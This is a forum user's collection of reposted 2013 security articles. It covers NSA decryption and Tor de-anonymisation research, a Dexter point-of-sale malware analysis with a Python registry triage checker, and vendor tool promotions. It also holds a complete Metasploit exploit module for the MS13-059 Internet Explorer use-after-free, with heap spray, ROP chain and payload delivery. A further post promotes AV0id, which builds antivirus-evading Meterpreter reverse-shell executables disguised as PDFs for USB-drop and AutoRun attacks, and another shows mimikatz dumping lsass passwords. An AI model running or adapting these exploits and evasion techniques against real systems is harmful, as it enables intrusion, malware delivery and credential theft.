Everything posted by Nytro
-
[h=2]September 5, 2013[/h]
[h=3]The NSA Is Breaking Most Encryption on the Internet[/h]

The new Snowden revelations are explosive. Basically, the NSA is able to decrypt most of the Internet. They're doing it primarily by cheating, not by mathematics.

It's joint reporting between the Guardian, the New York Times, and ProPublica. I have been working with Glenn Greenwald on the Snowden documents, and I have seen a lot of them. These are my two essays on today's revelations.

Remember this: The math is good, but math has no agency. Code has agency, and the code has been subverted.

Source: Schneier on Security: The NSA Is Breaking Most Encryption on the Internet
-
TOR Should Not Be Solely Used for Privacy
Posted by: FastFlux, September 5, 2013

The Tor network has been getting a lot of attention lately. About two weeks ago, the number of users on the anonymous network mysteriously doubled, hitting a record high. It could be because of the Pirate Bay's new Tor-powered browser. It could also be a result of recent web censorship by the Russian government. Or it could be new malware that is utilizing the network to hide its Command and Control (C&C) servers.

A new report from the US Naval Research Laboratory and Georgetown University in Washington DC is called "Users Get Routed: Traffic Correlation on Tor by Realistic Adversaries." Researchers claim that it is not very difficult to expose the bulk of users' identities if an attacker is willing to put in the time and effort, according to the Register. It's even easier for government and spy agencies that have the money to do so.

So, how bad is the security risk? The study found that even if an attacker had no control of routers, 80 percent of Tor users could be de-anonymized within six months. With control of one exchange point, or autonomous system (AS), around 100 percent of users were likely to be uncovered within three months. With two, it could take just one day.

"These results are somewhat gloomy for the current security of the Tor network," researchers wrote, adding that "Current users of Tor should carefully consider if it meets their security needs."

Source: http://zerosecurity.org/technews/tor-solely-privacy
-
[h=3]Point-of-Sale Malware: Infostealer.Dexter[/h]

Haven't posted in a while, so let's do something... Back on some old material, due to a 'recent' compromise of off-sho.re servers, and the circulation between AVs of Cyberbunker sinkhole logs. (Especially the Alina connections were interesting, but that's not the topic.)

Do you remember Dexter? Nah, not the TV series, but the PoS malware. Systems infected by Dexter are various in our case (gas stations, pawn shops, logistics, luxury shops, doctors, clinics, pharma, labs, etc...). This malware was coded by a guy known as 'dice' (there was an advert on Darkode made by him around November 2012 if I remember, but he requested an admin to remove the thread so it's not available anymore). Visa USA released an alert one month after.

Sample which came from the compromised server: Let's see, I will spare you the Visual Basic 6 unpacking step; if you want the hashes:
Original: bb0b17c2f66a868cf1e8a46626366a32
Depacked: e74593552b66a4638b80a4fbf2fb7438

Create a mutex:
Determine if we are under x64:
Create a suspended process of IE:
Copy the EXE in memory:
WriteProcessMemory on Internet Explorer with the content of the exe:
Then it does a CreateRemoteThread on IE and ExitThread on this process.

Ok, what happens with the injected IE? I've patched the executable by taking some jumps it had not taken at the beginning, to make it think we are in IE and see what happens.

Create a subkey 'HelperSolutions Software':
Create a folder %APPDATA%/Java Security Plugin, then CopyFile and do a DeleteFile on the original exe.
Do a RegCreateKey/RegSetValue/RegCloseKey with 'digit' as registry entry and 'cc98afca-1a04-4c5d-80cf-1cc78244b63e' as value for me.
Create a registry persistence 'Sun Java Security Plugin':
Do the same but this time in HKCU:
Create another registry entry, but this time: HKCU Software\Microsoft\Windows\CurrentVersion\Policies\Associations with 'LowRiskFileTypes' and '.exe;.bat;.reg;.vbs;' as value.
The 'Policies\Associations' subkey lets you manage the default risk level for file attachments (low-risk/medium-risk/high-risk file types). The attachment manager in Windows can help protect your computer from unsafe attachments that you might receive with an e-mail message and from unsafe files that you might save from the Internet.
Edit a value at HKCU: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0, registry entry '1806' with '0' as value. '1806' is the registry entry about launching applications and unsafe files in Internet Explorer. The value can be zero, one, or three; typically, a setting of zero sets a specific action as permitted, a setting of one causes a prompt to appear, and a setting of three prohibits the specific action.
Do the same operation but in HKLM this time:
The file initialises a thread:
Extract a resource:
Create a DLL 'SecureDll.dll' with the extracted resource and attribute Hidden:
Load the DLL:
Create a path:
Create a reg key at Software\HelperSolutions Software 'val1' with value 'C:\Documents and Settings\Administrateur\Bureau\strokes.log'
Create a second reg key at Software\HelperSolutions Software 'val2' with value 'C:\Documents and Settings\Administrateur\Bureau\tmp.log'
Hook the keyboard:
Refer to the MSDN for explanation:

Okay... let's have a look at what this SecureDll.dll does; seems it's not that secure.
Look for the previous reg keys: val1 and val2.
Look for some specific processes running on the system. Here is a list:
wmiprvse.exe (Microsoft Windows Management Instrumentation)
LogonUI.exe (Windows LogOn User Interface)
svchost.exe (Service Host Process)
iexplore.exe (Internet Explorer)
explorer.exe (generic Windows process)
System (Internal Windows system process)
smss.exe (Session Management Subsystem)
csrss.exe (Client/Server Runtime Subsystem)
winlogon.exe (Windows LogOn Process)
lsass.exe (Local Security Authority Subsystem Service)
spoolsv.exe (Printer Spooler Service)
alg.exe (Application Layer Gateway)
wuauclt.exe (Windows Update client for Windows ME)
firefox.exe
chrome.exe
devenv.exe (Microsoft Visual Studio)
Then it starts to open processes and look for track1/2/3, and when finally something is detected, make it a string:
After looking at all processes it will create some threads: the first will just do a new scan of processes; the second thread makes sure everything is ok with the registry key 'run'; the third does a loop to detect if the PC is going to shut down (I've not looked, but DetectShutdownClass seems explicit enough).
Then it enters a procedure to call home:
Get user name:
Get the computer name:
Get the OS version:
Architecture:
Retrieve the string used to identify the machine that was stored in the registry (cc98afca-1a04-4c5d-80cf-1cc78244b63e)
Open strokes.log and read it, then delete it:
Read the content of tmp.log:
Enter a decode routine:
Create a file Debug.log:
Write it:
And delete tmp.log:
Take our hwid and enter the routine to encode it:
Then it will do that again but with the process name where it grabbed the track info, and also take PC info, etc...
From the original source code:
At the end we have a huge string like:
page=RUUZTk9FSURRTk1OHVFIGBhJUUQYRUpRSkQaTUwYSUhNTx0f&ump=ACgZHREqFRkLGQ4jLxkOChUfGVIZBBlGR0hNTU1NTU1NTU1NTU1NTU1BTU9MS01MTUxMTExMTExMTExKSkpDWT5ITU1NTU1NTU1NTU1NTU1NIiQlMDU+MyRTMD0+L1wxLiJNT0xLTUxNTExMTExMTExMTExMTExMTExMTExKSkpMTE
C&C domain and gate path are given via pointers due to the Internet Explorer injection.
After having called the gateway, Dexter does a 600000 ms sleep (10 mins):
And does the shit again, then re-calls home every 10 mins.
Now about the C&C responses, I noticed these actions: update- chekin: scanin: unistall download-
I've not searched how the following commands work; Josh Grunzweig of SpiderLabs already explained it.

So... enough boring reversing info, let's have a look at the panel now.
Login:
Dashboard:
More than 3000 bots, most of them are commercial machines.
Like Alina, Dexter uses colour codes: dead bots appear in red and recently dead bots in blue:
Dumps (stolen credit cards):
Keylogger logs (here, that seems to be a UPS dispatch center, or something like this):
Process viewer (not working):
Another but small Dexter panel:
I've also found an older version of Dexter; I thought it was Alina at first, but nope, Dexter v1:
Dashboard:
Dumps:
Bots:
Process list (this time it works):
Uploader was not found due to a programming error:
Dexter 'v2' C&C structure:
Just ignore the 'installer' folder, that's something homemade for a video.
Get track type function:
That even grabs track3.
600 posts reached
Posted by Steven K at 23:09

Source: XyliBox: Point-of-Sale Malware: Infostealer.Dexter
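Added example, not code from the XyliBox write-up: a Python triage check that parses a Windows .reg export (as produced by `reg export`) and flags the registry artefacts the analysis above lists (the HelperSolutions Software key with 'digit'/'val1'/'val2', the 'Sun Java Security Plugin' Run entry, LowRiskFileTypes, and Internet Explorer zone 0 action 1806 set to 0). The sample export is constructed; the Run key path is an assumption based on the write-up's mention of the 'run' key, and the dropped file name is a placeholder.

```python
"""Offline triage of a Windows .reg export for the Dexter artefacts described above.

Added example; the indicator values come from the write-up, the sample export is
constructed, and the Run key path is assumed from the write-up's 'run' key mention.
"""
import re
from typing import Dict, List, Optional

HKCU = "HKEY_CURRENT_USER"
HKLM = "HKEY_LOCAL_MACHINE"
IE_ZONE0 = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"
ASSOCIATIONS = r"Software\Microsoft\Windows\CurrentVersion\Policies\Associations"
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"  # assumed: the 'run' key mentioned
HELPER_KEY = r"Software\HelperSolutions Software"
PERSISTENCE_NAME = "Sun Java Security Plugin"

SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.+)$')


def decode_reg_data(data: str) -> str:
    """Decode the common .reg data encodings to a comparable string."""
    if data.startswith('"') and data.endswith('"'):
        return data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if data.lower().startswith("dword:"):
        return str(int(data[6:], 16))  # "dword:00000000" -> "0"
    return data  # hex(...) blobs and other encodings are left raw


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Map upper-cased key path -> {lower-cased value name: decoded data}."""
    keys: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        section = SECTION_RE.match(line)
        if section:
            current = section.group(1).upper()
            keys.setdefault(current, {})
            continue
        value = VALUE_RE.match(line)
        if value and current is not None:
            keys[current][value.group("name").lower()] = decode_reg_data(value.group("data"))
    return keys


def check_dexter_indicators(keys: Dict[str, Dict[str, str]]) -> List[str]:
    """Return one finding per Dexter artefact present in the parsed export."""
    def get(hive: str, path: str, name: str) -> Optional[str]:
        return keys.get(f"{hive}\\{path}".upper(), {}).get(name.lower())

    findings: List[str] = []
    for hive in (HKCU, HKLM):
        # Zone 0 action 1806 = 0: applications and unsafe files launch without a prompt
        if get(hive, IE_ZONE0, "1806") == "0":
            findings.append(f"{hive}: IE zone 0 action 1806 set to 0 (unsafe files run without prompt)")
        # Machine id and keylog/temp file paths Dexter keeps under its own key
        if get(hive, HELPER_KEY, "digit") is not None:
            findings.append(f"{hive}: {HELPER_KEY}\\digit present (Dexter machine id)")
        for name in ("val1", "val2"):
            path = get(hive, HELPER_KEY, name)
            if path is not None:
                findings.append(f"{hive}: {HELPER_KEY}\\{name} -> {path}")
        # Run-key persistence under the 'Sun Java Security Plugin' name
        target = get(hive, RUN_KEY, PERSISTENCE_NAME)
        if target is not None:
            findings.append(f"{hive}: Run entry '{PERSISTENCE_NAME}' -> {target}")
    # Attachment Manager policy downgraded so .exe/.bat/.reg/.vbs count as low risk
    low_risk = get(HKCU, ASSOCIATIONS, "LowRiskFileTypes")
    if low_risk and ".exe" in low_risk.lower():
        findings.append(f"{HKCU}: LowRiskFileTypes includes executables ({low_risk})")
    return findings


# Constructed sample export; values copied from the write-up except the dropped
# file name, which is a placeholder.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\HelperSolutions Software]
"digit"="cc98afca-1a04-4c5d-80cf-1cc78244b63e"
"val1"="C:\\Documents and Settings\\Administrateur\\Bureau\\strokes.log"
"val2"="C:\\Documents and Settings\\Administrateur\\Bureau\\tmp.log"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Sun Java Security Plugin"="C:\\Documents and Settings\\Administrateur\\Application Data\\Java Security Plugin\\DROPPED_EXE_PLACEHOLDER.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=".exe;.bat;.reg;.vbs;"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1806"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1806"=dword:00000000

[HKEY_CURRENT_USER\Software\ExampleVendor\Benign]
"Setting"=dword:00000001
"""


def triage(text: str) -> List[str]:
    """Parse an export and return the Dexter findings it contains."""
    return check_dexter_indicators(parse_reg_export(text))


if __name__ == "__main__":
    for finding in triage(SAMPLE_EXPORT):
        print("[!]", finding)
```

On a live host the same checks can be fed from `reg export HKCU hkcu.reg` and `reg export HKLM hklm.reg`; note that a clean machine with zone action 1806 set to 0 by policy will also trigger that one finding.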
-
Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow
Authored by Vitaliy Toropov | Site packetstormsecurity.com

A heap memory buffer overflow vulnerability exists within WebKit's JavaScriptCore JSArray::sort(...) method. The exploit for this vulnerability is JavaScript code which shows how to use it for memory corruption of internal JS objects (Uint32Array etc.) and subsequent arbitrary code execution (custom ARM/x64 payloads can be pasted into the JS code). This exploit affects Apple Safari version 6.0.1 for iOS 6.0 and OS X 10.7/8. Earlier versions may also be affected. It was obtained through the Packet Storm Bug Bounty program.

Download: http://packetstormsecurity.com/files/download/123088/PSA-2013-0903-1-exploit.tgz

Source: Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow - Packet Storm
-
MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free
Authored by corelanc0d3r, sinn3r | Site metasploit.com

This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This Metasploit module can be used against version 9.0.8112.16446, but not for 9.0.8112.16421. IE 8 requires a different way to trigger the vulnerability, but not currently covered by this module. The issue is specific to the browser's IE7 document compatibility, which can be defined in X-UA-Compatible, and the content editable mode must be enabled. An "onmove" event handler is also necessary to be able to trigger the bug, and the event will be run twice before the crash. The first time is due to the position change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable' object is created during a "SelectAll" command, and this object will be used later on for the crash. The second onmove event seems to be triggered by an InsertButton (or Insert-whatever) command, which is also responsible for the free of object CFlatMarkupPointer during page rendering. The EnsureRecalcNotify() function will then still return an invalid reference to CFlatMarkupPointer (stored in EBX), and then passes this on to the next functions (GetLineInfo -> QIClassID). When this reference arrives in function QIClassID, an access violation finally occurs when the function is trying to call QueryInterface() with the bad reference, and this results in a crash. Successful control of the freed memory may leverage arbitrary code execution under the context of the user. Note: It is also possible to see a different object being freed and used; it doesn't always have to be CFlatMarkupPointer.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::RopDb

	def initialize(info={})
		super(update_info(info,
			'Name'           => "MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free",
			'Description'    => %q{
					This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems
					to only affect certain releases of mshtml.dll. For example: This module can be used against
					version 9.0.8112.16446, but not for 9.0.8112.16421. IE 8 requires a different way to trigger
					the vulnerability, but not currently covered by this module. The issue is specific to the
					browser's IE7 document compatibility, which can be defined in X-UA-Compatible, and the
					content editable mode must be enabled. An "onmove" event handler is also necessary to be
					able to trigger the bug, and the event will be run twice before the crash. The first time
					is due to the position change of the body element, which is also when a
					MSHTML!CFlatMarkupPointer::`vftable' object is created during a "SelectAll" command, and
					this object will be used later on for the crash. The second onmove event seems to be
					triggered by a InsertButton (or Insert-whatever) command, which is also responsible for
					the free of object CFlatMarkupPointer during page rendering. The EnsureRecalcNotify()
					function will then still return an invalid reference to CFlatMarkupPointer (stored in
					EBX), and then passes this on to the next functions (GetLineInfo -> QIClassID). When this
					reference arrives in function QIClassID, an access violation finally occurs when the
					function is trying to call QueryInterface() with the bad reference, and this results a
					crash. Successful control of the freed memory may leverage arbitrary code execution under
					the context of the user.

					Note: It is also possible to see a different object being freed and used, doesn't always
					have to be CFlatMarkupPointer.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'corelanc0d3r', # Vuln discovery, PoC
					'sinn3r'        # Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2013-3184' ],
					[ 'OSVDB', '96182' ],
					[ 'MSB', 'MS13-059' ],
					[ 'BID', '61668' ],
					[ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-13-194/' ],
					[ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-13-195/' ]
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Vulnerable IE9 tested: 9.0.8112.16446
					[ 'Automatic', {} ],
					[ 'IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)', {} ]
				],
			'Payload'        =>
				{
					'BadChars'        => "\x00",
					'StackAdjustment' => -3500
				},
			'DefaultOptions'  =>
				{
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Privileged'     => false,
			'DisclosureDate' => "Jun 27 2013",
			'DefaultTarget'  => 0))
	end

	def rnd_dword
		rand_text_alpha(4).unpack("V").first
	end

	def get_fake_obj
		# edx,dword ptr [eax]
		# ...
		# call edx
		obj = [0x20302020].pack("V*") # EAX points to this (Target spray 0x20302020)
		obj << [rnd_dword].pack("V*")
		obj << [rnd_dword].pack("V*")
		obj << [rnd_dword].pack("V*")
		obj << [rnd_dword].pack("V*")
		return obj
	end

	# Target spray 0x20302020
	# ESI is our fake obj, with [esi]=0x20302020, [esi+4]=0x42424242, so on
	# eax=20302020 ebx=80004002 ecx=0250d890 edx=cccccccc esi=03909b68 edi=0250d8cc
	# eip=cccccccc esp=0250d87c ebp=0250d8a8 iopl=0         nv up ei ng nz na po cy
	# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010283
	# cccccccc ??              ???
	def get_payload
		code = ''
		code << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
		code << "\x61\x9d"                 # popad; popfd
		code << payload.encoded

		stack_pivot = [
			0x7c342643, # xchg eax, esp; pop edi; add [eax], al, pop ecx; ret
			0x0c0c0c0c
		].pack("V*")

		p = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
		return p
	end

	def is_win7_ie9?(agent)
		(agent =~ /MSIE 9/ and agent =~ /Windows NT 6\.1/)
	end

	# The meta-refresh seems very necessary to make the object overwrite more reliable.
	# Without it, it only gets about 50/50
	def get_html(cli, req)
		js_fake_obj = ::Rex::Text.to_unescape(get_fake_obj, ::Rex::Arch.endian(target.arch))
		js_payload  = ::Rex::Text.to_unescape(get_payload, ::Rex::Arch.endian(target.arch))

		html = %Q|
		<html>
		<meta http-equiv="X-UA-Compatible" content="IE=7"/>
		<meta http-equiv="refresh" content="2"/>
		<head>
		<script language='javascript'>
		#{js_property_spray}

		var fake_obj = unescape("#{js_fake_obj}");
		var s = unescape("#{js_payload}");
		sprayHeap({shellcode:s});

		function setupPage() {
			document.body.style.position = 'absolute';
			document.body.contentEditable = 'true';
			document.body.style.right = '1';
		}

		function hitMe() {
			document.execCommand('SelectAll');
			document.execCommand('InsertButton');
			sprayHeap({shellcode:fake_obj, heapBlockSize:0x10});
			document.body.innerHTML = '#{Rex::Text.rand_text_alpha(1)}';
		}
		</script>
		</head>
		<body onload="setupPage()" onmove="hitMe()" />
		</html>
		|

		html.gsub(/^\t\t/, '')
	end

	def on_request_uri(cli, request)
		if is_win7_ie9?(request.headers['User-Agent'])
			print_status("Sending exploit...")
			send_response(cli, get_html(cli, request), {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
		else
			print_error("Not a suitable target: #{request.headers['User-Agent']}")
			send_not_found(cli)
		end
	end
end
```

Source: MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free - Packet Storm
-
[h=1]Federal Friday - 8/30/2013: DHS/FBI Highlight The Importance Of Keeping Android Devices Updated[/h]
Posted by Sajal Sahay in Information Security on Aug 30, 2013 3:08:58 PM

A memo sent to Police, Fire and EMS personnel nationwide from the FBI and Department of Homeland Security earlier this summer was recently made public. According to the memo, the Android operating system is the primary target for mobile malware attacks. At face value, this would not be surprising given that Android commands ~80% market share in the US, so should proportionally experience the largest number of malware attacks. However, the same report says that iOS was targeted < 1% of the time, which is well below Apple's market share. So, what's the difference?

The real insight comes later in the report. "Industry reporting indicates 44% of Android users are still using versions 2.3.3 through 2.3.7 – known as Gingerbread – which were released in 2011 and have a number of security vulnerabilities that were fixed in later versions." Rapid7's mobile customer database shows that 49% of Android devices contain at least one high severity vulnerability, aligning closely with the % of devices with older versions of OS still running on them.

So, the most effective way for organizations to eliminate these vulnerabilities is to ensure all employee devices are updated to the latest OS version. However, because the mobile ecosystem is so complex and OS updates require coordination between handset manufacturers, OS vendors and carriers, these updates can sometimes take months to deploy and create large windows of risk. Even the ACLU has gotten involved, accusing the major US carriers of deceptive business practices due to untimely updates of Android devices. See our previous blog on this topic.

Rapid7 has an answer to this problem. Our Mobilisafe mobile risk management solution makes it easy for organizations to help their employees update their devices. Mobilisafe identifies the mobile devices connecting to organizational data, and assesses each device for its vulnerability risk and whether it is eligible for an OS update. For those devices that can be updated, Mobilisafe automatically sends emails to the employee, with direct links to the OEM site where the device update can be completed. Policies can also be created that block devices from accessing organizational data if the update is not completed within a set period of time.

For a free demo of Mobilisafe, click here, and our usual Federal Blogger John Schimelpfenig will be back next week.

Source: https://community.rapid7.com/community/infosec/blog/2013/08/30/dhsfbi-highlight-the-importance-of-keeping-android-devices-updated
-
[h=1]Rapid7 Free Tools - Download Today![/h]
Posted by Patrick Hellen in Information Security on Aug 30, 2013 12:06:08 PM

Hello all, It's your friendly neighborhood Community Manager again, this time reaching out to talk about something that should be of interest to all of you: Rapid7's suite of Free Security Tools. If you're a one man shop, trying to make sure you're as buttoned up as possible, or a giant organization just looking to do some validation and double checking, I'm sure one or more of these tools would be an excellent addition to your existing security portfolio. Here's a list of our own portfolio. Click on the links to get some additional information, and to download the licenses.

Nexpose Community Edition: Our original tool - Nexpose is a vulnerability scanning software that is the best in the business. Don't take my word for it though. To see how excellent it is, download the community edition, and test it out for yourself, on your own networks. We're pretty sure that if you're looking for an enterprise tool, the taste-test available with the community edition will be more than enough to prove its value.

Metasploit Community Edition: Metasploit, our penetration testing tool, is the perfect piece of software for both pen testing your networks, and validating the findings of your latest vulnerability scan. Also, if you're looking to teach yourself how to be a pen tester, the only way to learn, really, is to do. Download our community edition, start your testing, and interact with other pen testers here on SecurityStreet to learn more.

Mobilisafe 14-day Trial: Are you looking to better understand the risks that you're facing with BYOD? Want to mitigate the risks associated with employees who keep forgetting to update or patch their own devices? Try out our free Mobilisafe 14 day trial, and learn how easy it is to keep the risk of the mobile devices on your network low.

RiskRater: Our newest free tool, RiskRater is a survey that will measure your mobile, endpoint, and user based risk, in comparison to industry benchmarks. We asked, and over 600 organizations answered our 18 question survey, to help us set up the benchmarks. You can use this tool to see how your own security stance and configurations compare. Also, each question you answer provides you with real and actionable follow up tasks that can help address the risk that you helped expose in your survey. We're not going to save or share your information, and there's nothing to download - just click to launch the tool, and get a good spot check on your real risk.

Metasploitable: If you're new to Penetration Testing, and you're just starting to learn Metasploit, you don't want to test something out on your production network. Having to explain to your boss why critical system # 1 is down is not an ideal conversation to have. To address this, the Metasploit team developed Metasploitable. This is a safe, and intentionally vulnerable virtual machine that you can run pen tests against to make sure you understand how to best use the exploits at your disposal. The Metasploit team calls it a "pen test in a box," so if you'd like to try it out, please download our VMware virtual machine here and get started.

ScanNow - MySQL: The MySQL vulnerability CVE-2012-2122, best described in HD Moore's post here, is quite a risk, allowing every 256th login regardless of password. If you'd like to quickly and easily check to see if your MySQL servers are vulnerable, just click and download and run the test yourself.

ScanNow - UPnP: This free ScanNow scanner checks your network enabled devices to see if they are vulnerable to an attack via UPnP. This blog and whitepaper from Rapid7 and HD Moore estimates upwards of 50 Million network devices are at risk because of vulnerabilities found in this protocol. Click and download this free tool, to see if you're one of the millions of people affected by this, and what you can do to make sure you close this potentially damaging security flaw.

UPnP Router Check: Want a quick router scan to check on the status of UPnP enabled devices? Click here and run a scan quickly and easily. This will only check your router exposure, so make sure to download the free ScanNow UPnP tool listed above to check your internal status.

And finally, BrowserScan: This free tool enables your organization to check on the browsers currently in use, and allows you to identify the risk of out of date items, unpatched plug-ins, and can even restrict access to sensitive information until a fix or upgrade is secured. It's as simple as embedding a tracking code on your internal site, to look up all the browsers in use, and can even return analytics to show you how you're addressing your risk over time.

I also recommend that you check out Kali Linux - by Offensive Security, the same team that brought you Backtrack. Kali Linux, the upgraded Backtrack, is a Debian derived Linux distribution that was designed for both pen testing and digital forensics. Kali is full of open source tools that you can use to test your own networks including nmap, Wireshark, John the Ripper, and Aircrack-ng. Due to a partnership between Offensive Security and Rapid7, a specially designed license of Metasploit is available as an internal component to the download. Visit Offensive Security to learn more.

All of these tools, as I mentioned, are 100% free to download and use. Most of them are so user-friendly, it can take as little as 10 seconds in some cases to find out your level of risk regarding a specific vulnerability. My own philosophy on using these tools? If anything can make it harder for an attacker to gain access, then it's worth taking a shot, and if it's free, it's worth a small amount of your time, isn't it?

Now I know that's a lot to take in and review, so if you've got any questions about these products - or if you're currently using them, and you'd be willing to share some of your best practices or tips on how they've worked successfully in your own environments, please let us know! You can drop us a line here, and include some info on what you're working on, and we would love to discuss any findings or feedback you have. Finally, if you've got a great idea for another free tool that we could develop, please let us know. Who knows? If we do design it, maybe we'll name it after you?

Thanks all, and feel free to drop me a line here if you'd like to discuss offline.
Patrick Hellen

Source: https://community.rapid7.com/community/infosec/blog/2013/08/30/rapid7-free-tools--download-today
-
AV0id – Anti-Virus Bypass Metasploit Payload Generator Script
by Common Exploits

Introducing a simple script I have created to bypass most Anti-Virus products. This script is based on scripts I used whilst attempting to avoid A.V; credit to all authors of the mentioned scripts below for their research and work. This was just a very quick script I put together to make life a bit easier. What it does is generate a Metasploit Meterpreter payload executable automatically for you. It auto changes the icon to a PDF and also auto creates AutoRun files. So you can then use this file via a shell upload to get a reverse shell via Metasploit, place on a USB stick for some social engineering/phishing attacks, or burn to a CDROM for some AutoRun fun.

There are many good tools/scripts around, but a lot of these are now detected by most Anti-Virus products. On a recent laptop assessment I was getting blocked by McAfee attempting an AutoRun exploit and most tools and encoding would not get round this, so I decided to knock up a quick script that did get round it. Even if you are not looking to get around A.V, or this gets detected more in the future, it is a very easy script to generate you a quick Meterpreter payload for your local or remote listener. Some screen shots, download path and A.V bypass script comparisons below.

At its best my script was only detected by 10 out of 46 Anti-Virus products; this depends on which stealth option you use. At its lowest it was about 14/15 A.V products that found this. This still bypasses 20+ more products than just encoding the payload using Msfencode or Msfvenom. It uses Msfencode, but also pads the file and re-compiles the executable including a PDF icon. The file size and contents are never the same for every executable generated, which helps it avoid most Anti-Virus products. The more intelligent A.V products will still pick it up.

Download from the NCC Open Source GitHub Repository below:
https://github.com/nccgroup/metasploitavevasion

Tested on Backtrack 5 and Kali only. Run as root. Exploit on victim now opens minimised, thanks to @redmeat_uk for the info.

It requires two very small files in order to create the PDF icon and AutoRun files. It will auto download these if they are not within the directory. If it can't download them it will continue, but it will not create the PDF icons. If you want to download these two files in advance, just get them below. Place them in the same directory as the script is stored. If you want to change the autorun.ico for your own icon, this will change the autorun icon. To change the exe icon is a little more complex and is compiled from the icon.res file. Google around and you can create this using windres.

wget http://www.commonexploits.com/tools/avoid/autorun.ico
MD5 checksum: ebe763172e90b7f218d522b13abbc5c1
wget http://www.commonexploits.com/tools/avoid/icon.res
MD5 checksum: 876caf8703c803d7a2359103adc9ce58

Select local system or remote. If you select local it will auto grab your local IP address and use that. If you select alternative, it will ask you which IP address to listen on, then give you the msf listener code to run at the end.

Enter the port number to listen on. If local it doesn't really matter, but if external they may have some restrictions, so try port 80, 443 or 53. In a recent test I found workstations could talk directly outbound on DNS/53, so I could get an AutoRun shell out to the internet.

There are 5 options for the payload. The more stealthy, the bigger the file. All this is doing is padding out with more random junk, which seems to reduce the detection ratio slightly. If size is not an issue, i.e. using a CD or USB, then try the most stealthy option for better results. I have not tested option 5 on online scanners as it exceeds the upload limit.

It then saves the executable named salaries.exe; you can change the name at the top of the script header. You could use this and place on a few USB sticks and leave around the building; I am sure curious staff may want to open it, and as it has a PDF icon it helps. It also creates you an autorun directory; simply burn these to a CDROM to try an AutoRun shell or a U3 USB – normal USB sticks won't AutoRun, and obviously if the system has AutoRun disabled it will not work.

It will then launch the listener locally. Or if you selected an alternative system, it will give you the code to copy and paste to start the listener. Then run the exploit and you will get your shell. In this case the AutoRun exploited without any user interaction.

I ran this against 46 Anti-Virus products and got fairly good results. Below is a comparison I made with the most commonly known and used A.V avoidance tools and scripts:
Standard Metasploit payload (encoded)
Shell Code Exec
Vanish Script
AV0ID
Syringe

Quick high level view on the above scripts.

Shell Code Exec: Great tool created by Bernardo Damele that did get round almost all A.V products. The shellcode exe now does get detected more as this file stays the same. Bernardo allows you to download the source code, so I believe a quick modification to the file and a recompile would get round this. Info here: Bernardo Damele A. G.: Execute Metasploit payloads bypassing any anti-virus. Download here: https://github.com/inquisb/shellcodeexec. This is also built into SET (Social Engineering Toolkit) under the media generator options.

Vanish Script: Great script that inspired my script. Created originally by Astr0baby in 2011 and modified by Vanish3r, it generates the Metasploit payload for you. It is getting more detected now. Download here: [bash] Vanish Script - Pastebin.com

Syringe: This works in a very similar way to Shellcode exec, but I found this to be very good and it got round a lot of A.V products. This was the only tool that got around Microsoft A.V in my testing. Download here: https://code.google.com/p/syringe-antivirus-bypass/

Source: AV0id – Anti-Virus Bypass Metasploit Payload Generator Script | Common Exploits - Penetration Testing Information
-
[h=1]mimikatz: Tool To Recover Cleartext Passwords From Lsass[/h]

I meant to blog about this a while ago, but never got round to it. Here’s a brief post about a very cool feature of a tool called mimikatz. I’m very grateful to the tool’s author for bringing it to my attention. Until that point, I didn’t realise it was possible to recover the cleartext passwords of logged-on Windows users. Something that I’m sure most pentesters would find very useful.

Here’s some sample output provided by the author:

    mimikatz 1.0 x86 (pre-alpha)    /* Traitement du Kiwi */

    mimikatz # privilege::debug
    Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

    mimikatz # inject::process lsass.exe sekurlsa.dll
    PROCESSENTRY32(lsass.exe).th32ProcessID = 488
    Attente de connexion du client...
    Serveur connecté à un client !
    Message du processus :
    Bienvenue dans un processus distant
    Gentil Kiwi
    SekurLSA : librairie de manipulation des données de sécurités dans LSASS

    mimikatz # @getLogonPasswords
    Authentification Id        : 0;434898
    Package d'authentification : NTLM
